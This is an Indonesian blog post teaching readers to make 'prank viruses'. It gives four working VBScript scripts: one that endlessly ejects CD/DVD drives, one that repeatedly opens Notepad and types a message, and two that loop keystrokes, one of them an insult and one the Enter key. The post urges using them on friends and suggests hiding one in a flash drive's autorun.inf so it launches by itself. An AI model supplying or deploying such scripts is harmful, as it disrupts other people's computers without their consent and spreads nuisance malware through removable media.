Belajar ilmu Komputer dan Internet

Cara membuat Virus Jahil

Cara membuat Virus Jahil

Waduh.. lagi-lagi tentang virus nih..
Virus Jahil, kenapa namanya jahil?yaps benar, karena virus ini di gunakan untuk menjahili teman atau orang-orang sekitar kamu.
nungguen yaaa..??
langsung saja dah..

Caranya: Buka notepad dan pastekan code berikut,
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpanlah file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan kamu asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x),
dan apa yang terjadi??
perhatikan CD/DVD ROM kamu akan terbuka/tertutup dengan sendirinya tanpa henti.

Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan file tadi ke file autorun.inf di flashdisk kamu, jadi setiap kamu colokin ke komputer kamu, maka akan otomatis dijalankan “Virus” Jahil ini.
gak cuma itu lho virusnya, masih ada lagi yang lain dan pastinya lebih jahil-jahil lagi..
ini dia.....
*VIRUS JAHIL 2

WScript.Sleep 18000
WScript.Sleep 1000
do
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys ". "
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "p"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
wscript.sleep 5000
loop

Scripts diatas nanti otomatis buka notepad dan ketik: Halo. apa kabar? kabar baik?
kata-katanya bisa di ubah kok, ubah kata yang bertanda kutip "
ingat yah simpan file dengan ekstensi nama .vbs, klik file–>save as

*VIRUS JAHIL 3

Kode Vbs ini akan membuat user terus mengetikkan kata2  “Kamu emang jelek koq!”
kata2 bisa di ubah sesuai selera kok.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Kamu emang jelak koq!"
loop

*VIRUS JAHIL 4

virus yang ini akan membuat user terus-menerus menekan "ENTER"
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Inget : Virus-virus di atas ada penangkalnya yaitu CRTL+ALT+DEL dan matikan proses wscripts.exe

udahan ahh.. segitu dulu yaah.. capek ngetiknya.
kapan-kapan kesini lagi ntar aku kasih tau virus-virus yang lain, Okeh!!!

pesan saya: boleh coba trik ini tapi jangan keterlaluan yaa... ntar temen kamu stress lhoo.. hehehe..

selamat mencoba kawan.................


share this article to: Facebook Twitter Google+ Linkedin Technorati Digg
Posted by Mievtah, Published at 02.58 and have 1 komentar

1 komentar:

  1. tutorial yang bagus sob.....visit back
    http://planktoon.blogspot.com/

    BalasHapus